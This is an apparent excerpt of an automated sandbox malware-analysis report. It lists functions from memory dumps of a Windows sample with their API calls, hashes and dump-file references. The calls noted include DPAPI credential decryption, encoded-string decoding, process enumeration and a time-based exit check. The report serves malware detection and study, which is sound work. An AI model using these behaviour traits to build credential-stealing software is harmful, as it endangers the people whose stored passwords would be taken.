                                  • Instruction ID: 0370d932ceacc24800d56f66e4c812f203c40a7e0cbffaafdf339106ef7a9585
                                  • Opcode Fuzzy Hash: 9ebccf49d38ea5a6ccc082a8be838188098a4c8f00cd31a98fbf311526efb029
                                  • Instruction Fuzzy Hash: F1B228F3A082049FE3046E2DEC8577ABBE9EFD4720F1A463DE6C4C7744E93598058696
                                  Function 00FF04BF Relevance: 9.1, Strings: 6, Instructions: 1607COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *;?$`W/$aw_$w3{$}$}
                                  • API String ID: 0-2686939119
                                  • Opcode ID: 8f345bad4f643d6f3db16460d2da9a85538d26a37527cf821e6032a6043b7001
                                  • Instruction ID: 2d26b2a2b1f23ccca8a822c76a880d582877d1caaa2de583d4833107d26403b9
                                  • Opcode Fuzzy Hash: 8f345bad4f643d6f3db16460d2da9a85538d26a37527cf821e6032a6043b7001
                                  • Instruction Fuzzy Hash: CBB207F3A0C6149FE3046E2DEC8567AFBE9EF94720F16453DEAC4C3744EA3558018696
                                  Function 00C0F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 6fbc80e0d4378046d1ff0c6b5f88f8801f40d80e87733e669c7944ac6b7f26a9
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: 54417012E19BD9C5CB058B7444A02AEBFB22FD6210F6D82AEC4DD1F7C2C774418AD3A5
                                  Function 00BAC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC97C
                                  • lstrcat.KERNEL32(?,00BC0B47), ref: 00BACA43
                                  • lstrcat.KERNEL32(?,00BC0B4B), ref: 00BACA57
                                  • lstrcat.KERNEL32(?,00BC0B4E), ref: 00BACA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 819cac0f9d345c08049ba6760558b8005d31025649cb9c09f6eed195a792c792
                                  • Instruction ID: d1ad23336671c24d66230d0ba9fd9adc3afb21f98b65c2d091d237a044c13215
                                  • Opcode Fuzzy Hash: 819cac0f9d345c08049ba6760558b8005d31025649cb9c09f6eed195a792c792
                                  • Instruction Fuzzy Hash: E6413DB590821EDFDB10DFA4DD89BFEBBB8BB48704F1041A8F509A6280D7745A84CF91
                                  Function 00BB6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00BB6C0C
                                  • sscanf.NTDLL ref: 00BB6C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB6C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB6C60
                                  • ExitProcess.KERNEL32 ref: 00BB6C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 8020271d6d583c9470348c36d2484e354362173a9d982b90d9dd409553fee7ee
                                  • Instruction ID: 9ef0100e564683a55b14641d8912a3d6b7a6ae5a3349b4a6114029316a006e4a
                                  • Opcode Fuzzy Hash: 8020271d6d583c9470348c36d2484e354362173a9d982b90d9dd409553fee7ee
                                  • Instruction Fuzzy Hash: 3221BBB5D14208AFCF04DFE4E8459EEB7B5FF48300F048569E51AB3250EB749648CB65
                                  Function 00BA72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BA72AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA72B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BA72E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BA7304
                                  • LocalFree.KERNEL32(?), ref: 00BA730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: fa9ccc6a003ad3d8c3fbd336c9fc74475a7fa6f3fc5739027e918d0b7602b813
                                  • Instruction ID: 259b52fef5719b558cb100405fe17bfb1f1a0b1181dc2b7264c95ff58c3f1227
                                  • Opcode Fuzzy Hash: fa9ccc6a003ad3d8c3fbd336c9fc74475a7fa6f3fc5739027e918d0b7602b813
                                  • Instruction Fuzzy Hash: 140140B5A48308BFDB10DFA4DC45F9D77B8EB44B00F104054FB49BA2D0DA70AA448B54
                                  Function 00BB9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB97AE
                                  • Process32First.KERNEL32(00BC0ACE,00000128), ref: 00BB97C2
                                  • Process32Next.KERNEL32(00BC0ACE,00000128), ref: 00BB97D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00BB97EC
                                  • CloseHandle.KERNEL32(00BC0ACE), ref: 00BB980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: b0088f3eebd717c7c0f19a996ce27b4b9776d57a249dce25ab6fdd6ad2d0dfd3
                                  • Instruction ID: 42af9577a57dc131414ec285a979bba193a628021328ef5611e1d2c9bac23688
                                  • Opcode Fuzzy Hash: b0088f3eebd717c7c0f19a996ce27b4b9776d57a249dce25ab6fdd6ad2d0dfd3
                                  • Instruction Fuzzy Hash: DA010C75A14208AFDB20DFA5CD88BEDBBF8FB08700F1045C8E949A6250EB709A84CF50
                                  Function 00BC4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 08af92a3f066262f836936b7f9f456b1b21084044b2b87ca93f180327f484345
                                  • Instruction ID: e70451efd5eca980357f0cd951a61e98dbf660ab4430a5fe3f7fcd4dbb17f10e
                                  • Opcode Fuzzy Hash: 08af92a3f066262f836936b7f9f456b1b21084044b2b87ca93f180327f484345
                                  • Instruction Fuzzy Hash: ED63533241EBD41ECB27CB3047B6A917FA6FA1321031D4ACEC5C18F5B3C694AA56E356
                                  Function 00FF8993 Relevance: 6.6, Strings: 4, Instructions: 1649COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =u5=$C?~{$S]~$v4q6
                                  • API String ID: 0-3509047163
                                  • Opcode ID: 37a0b7d0e7bb78fd9491ec62ca968fb7833d310a5c61ee678360c444e3e0fbf0
                                  • Instruction ID: 529c2ec8f817a0977cf8a32aa7c0400e97cfe45d9fe77c11791537746cdf25d0
                                  • Opcode Fuzzy Hash: 37a0b7d0e7bb78fd9491ec62ca968fb7833d310a5c61ee678360c444e3e0fbf0
                                  • Instruction Fuzzy Hash: 01B209F3A08200AFE704AE2DEC8567AF7E9EF94720F16453DEAC5C3744E63598058697
                                  Function 00BB9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00BA51D4,40000001,00000000,00000000,?,00BA51D4), ref: 00BB9050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 699724d8d0dc014267676513dca95998650490e9b022664d1d8f7f6df99cf2eb
                                  • Instruction ID: 4bbb89ffd1d0d7ed62fc369c2dd5ba04c45a245f9894c5deac5496df2bb95d99
                                  • Opcode Fuzzy Hash: 699724d8d0dc014267676513dca95998650490e9b022664d1d8f7f6df99cf2eb
                                  • Instruction Fuzzy Hash: 1E11F570204209EFDF00EF65D884BBA37E9AF89350F508488FA198B250D7B2E9419BA0
                                  Function 00BAA210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00BA4F3E,00000000,?), ref: 00BAA251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA27A
                                  • LocalFree.KERNEL32(?,?,?,?,00BA4F3E,00000000,?), ref: 00BAA28F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 0b3e7f36be4c39f1e7b306ab72b6e7b26c119063242a82102297f71bd675155d
                                  • Instruction ID: 598d51187a6f2e79881d38a74d7bf6038ef5ab07f0a34f23f1551f3dadb62c9f
                                  • Opcode Fuzzy Hash: 0b3e7f36be4c39f1e7b306ab72b6e7b26c119063242a82102297f71bd675155d
                                  • Instruction Fuzzy Hash: A011A4B4244308EFEB11CF64DC95FAA77B5EB89B10F208498FD199B390C772A941CB50
                                  Function 00BB7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0130E588,00000000,?,00BC0DF8,00000000,?,00000000,00000000), ref: 00BB7BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0130E588,00000000,?,00BC0DF8,00000000,?,00000000,00000000,?), ref: 00BB7C0D
                                  • wsprintfA.USER32 ref: 00BB7C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
